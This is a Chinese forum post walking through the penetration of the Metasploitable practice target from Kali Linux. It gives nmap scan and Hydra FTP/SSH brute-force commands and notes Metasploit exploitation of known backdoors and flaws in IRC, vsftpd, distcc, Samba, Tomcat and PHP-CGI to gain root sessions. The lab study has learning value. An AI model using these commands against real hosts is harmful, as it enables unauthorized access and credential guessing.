yun 发表于 2017-4-10 00:25:21

kali渗透metasploitable靶机

扫描阶段:工具:Nmap隐蔽扫描      nmap  -sS 192.168.8.135

端口爆破:FTP、SSH等工具:Hydra备用字典


[*]爆破FTP

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  ftp://192.168.8.135



[*]爆破SSH

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  192.168.8.135 ssh

登陆系统:


端口渗透:
[*]6667——-irc_3281_backdoor
利用metasploit

成功获取会话,root权限


[*]6200——-vsftpd_234_backdoor

利用metasploit

反弹会话,root权限

[*]1524——-ingrelock_backdoor
利用telnet连接1524,直接返回root会话



[*]1099——-distcc程序漏洞—-ingrelock

利用metasploit

返回会话


[*]139——-samba为3.0漏洞

先用nmap进行详细扫描nmap -v -A -T4 192.168.8.135


Samba 3.0.20利用metasploit


返回会话,root权限


[*]8180——-Apache Tomcat弱口令




使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破用默认自带的字典即可


爆破出tomcat/tomcat使用use exploit/multi/http/tomcat_mgr_upload模块获取meterpreter会话



[*]80——-PHP CGI参数注入执行漏洞




msf > search cve:2012-1823msf > use exploit/multi/http/php_cgi_arg_injectionmsf exploit(php_cgi_arg_injection) > show optionsmsf exploit(php_cgi_arg_injection) > set rhost 192.168.8.135rhost => 192.168.8.135msf exploit(php_cgi_arg_injection) > run



页: [1]
查看完整版本: kali渗透metasploitable靶机